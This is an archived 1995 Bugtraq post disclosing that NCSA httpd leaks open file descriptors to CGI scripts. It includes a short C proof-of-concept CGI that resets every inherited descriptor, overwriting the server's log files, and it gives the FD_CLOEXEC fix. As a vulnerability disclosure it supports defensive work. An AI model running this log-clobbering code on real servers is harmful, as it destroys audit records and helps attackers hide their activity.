[1625] in bugtraq
CGI script insecurity in NCSA httpd
daemon@ATHENA.MIT.EDU (Paul Phillips)
Thu Apr 27 05:48:42 1995
Date: Wed, 26 Apr 1995 23:43:49 -0700
From: Paul Phillips <paulp@CERF.NET>
Followup-To: comp.infosystems.www.providers
Cc: httpd@ncsa.uiuc.edu, bugtraq@fc.net
Greetings, all. Anyone with access to CGI scripts on your server can
destroy all your logfiles and possible wreak other havoc. The problem
is that NCSA httpd does not close open file descriptors on exec, so
CGI scripts still have access to all the originals. If you need a
demonstration, run the following as a CGI on your server:
#include <errno.h>
#include <sys/types.h>
#include <unistd.h>
#define OPEN_MAX 255 /* good enough :-) */
int main(int argc, char ** argv)
{
int i;
printf("Content-type: text/plain\n\n");
for(i = 0; i < OPEN_MAX; i++) {
if(lseek(i, 0, SEEK_SET) != -1 || errno != EBADF)
printf("I just reset fd %d. Ha!\n", i);
}
}
Please note that this will reset all your logfiles to the beginning,
causing new data to overwrite old data. Other, equally entertaining
things can be done with these open file descriptors. The fix is to
set the close-on-exec flag whenever a new file descriptor is allocated,
especially when the log files are opened, as in
fcntl(fd, F_SETFD, FD_CLOEXEC);
Since these file descriptors are open to root owned files, I pondered
whether cracking root was possible. It does not appear so, since fchmod
checks the euid of the process even though it has an open descriptor,
and this is normally "nobody". HOWEVER, I have not given the matter an
enormous amount of thought, so a greater vulnerability may exist here.
I welcome comments.
--
Paul Phillips EMAIL: paulp@cerf.net
WWW: http://www.primus.com/staff/paulp/ PHONE: (619) 220-0850
